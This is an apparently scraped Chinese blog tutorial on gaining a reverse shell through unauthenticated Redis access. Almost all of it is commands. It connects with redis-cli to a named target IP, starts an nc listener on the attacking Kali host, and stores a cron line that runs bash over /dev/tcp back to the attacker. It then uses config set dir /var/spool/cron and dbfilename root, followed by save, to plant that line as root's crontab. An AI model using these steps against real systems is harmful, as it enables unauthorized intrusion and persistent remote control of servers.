zoukankan      html  css  js  c++  java

  • Redis未授权访问反弹shell

    Redis未授权访问反弹shell

    目标主机:10.104.11.178

    攻击机:kali

    攻击步骤:

    1.与目标主机连接

    root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

     2.kali主机进行监听

    nc -l -v  -p 9999

     

    3.写入反弹shell语句

    set xxx "

*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1

"
config set dir /var/spool/cron
config set dbfilename root
save

     4.反弹shell连接成功
  • 相关阅读:
    SVN
    jenkins可视化
    Tomcat
    防火墙
    keepalived
    MHA高可用
    http
    inotifywait
    DNS
    nginx
  • 原文地址:https://www.cnblogs.com/someone9/p/8986502.html
Copyright © 2011-2022 走看看